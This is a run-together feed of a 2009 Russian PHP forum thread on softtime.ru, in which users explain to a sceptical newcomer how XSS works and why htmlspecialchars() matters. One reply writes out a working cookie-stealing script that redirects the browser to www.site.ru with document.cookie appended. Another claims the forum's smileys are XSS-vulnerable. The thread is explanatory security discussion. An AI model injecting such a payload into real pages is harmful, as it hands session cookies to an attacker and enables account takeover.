http://softtime.ru/forumhttp://softtime.ru/forum/read.php?id_forum=1&id_theme=63491#post370100Про XSS атаки слышали что нибудь? :) PS Кстати на этом форуме в смайликах XSS есть...проясните ситуациюMon, 16 Mar 2009 19:39:06 +0300Zend72http://softtime.ru/forum/read.php?id_forum=1&id_theme=63491#post370081Да, могут.проясните ситуациюMon, 16 Mar 2009 17:01:23 +0300cheopshttp://softtime.ru/forum/read.php?id_forum=1&id_theme=63491#post369813те если я соглашусь на предложение FF сохранить пароли от доступа на сайт mysite.ru и недайбог попаду на сайт с...проясните ситуациюSat, 14 Mar 2009 18:30:06 +0300vrazbroshttp://softtime.ru/forum/read.php?id_forum=1&id_theme=63491#post369805JS сценарий (будем говорить о "вредном случае") запущенный от имени домена вашего, спокойно извлекет куки (а с ними он работать...проясните ситуациюSat, 14 Mar 2009 17:42:25 +0300sim5http://softtime.ru/forum/read.php?id_forum=1&id_theme=63491#post369804я в шокепроясните ситуациюSat, 14 Mar 2009 17:42:24 +0300vrazbroshttp://softtime.ru/forum/read.php?id_forum=1&id_theme=63491#post369796"не понимаю :) чем таким javascript может угрожать людям ? :) таким ни чем угрожать не сможет, а вот если...проясните ситуациюSat, 14 Mar 2009 17:20:58 +0300Slo_Nikhttp://softtime.ru/forum/read.php?id_forum=1&id_theme=63491#post369795Вот такой код - "script" location.href='http://www.site.ru/index.php?cookie='+escape(document.cookie); "/script" - будет извлекать cookies и отправлять на сайт www.site.ru. Этот код может прийти...проясните ситуациюSat, 14 Mar 2009 17:20:45 +0300Mookapekhttp://softtime.ru/forum/read.php?id_forum=1&id_theme=63491#post369794Просто для этого нужно как я понимаю присвоить кукисы клиента какойто переменной, потом ее сохранить в базе или отправить куда...проясните ситуациюSat, 14 Mar 2009 17:14:18 +0300vrazbroshttp://softtime.ru/forum/read.php?id_forum=1&id_theme=63491#post369790А почему не вериться? И то и другое у клиента.проясните ситуациюSat, 14 Mar 2009 17:02:43 +0300sim5http://softtime.ru/forum/read.php?id_forum=1&id_theme=63491#post369788что то слобо верится чтобы с помошью javasscript можно украсть cookies....проясните ситуациюSat, 14 Mar 2009 16:59:12 +0300vrazbroshttp://softtime.ru/forum/read.php?id_forum=1&id_theme=63491#post369786С помощью javascript можно красть cookies и перенаправлять пользователей на другой сайт.проясните ситуациюSat, 14 Mar 2009 16:49:27 +0300Mookapekhttp://softtime.ru/forum/read.php?id_forum=1&id_theme=63491#post369782прочитал про htmlspecialchars() на http://www.softtime.ru/bookphp/gl3_2.php в конце -" Как понимаете, "приветик" может быть совсем не таким безобидным. не понимаю :)...проясните ситуациюSat, 14 Mar 2009 16:36:19 +0300vrazbros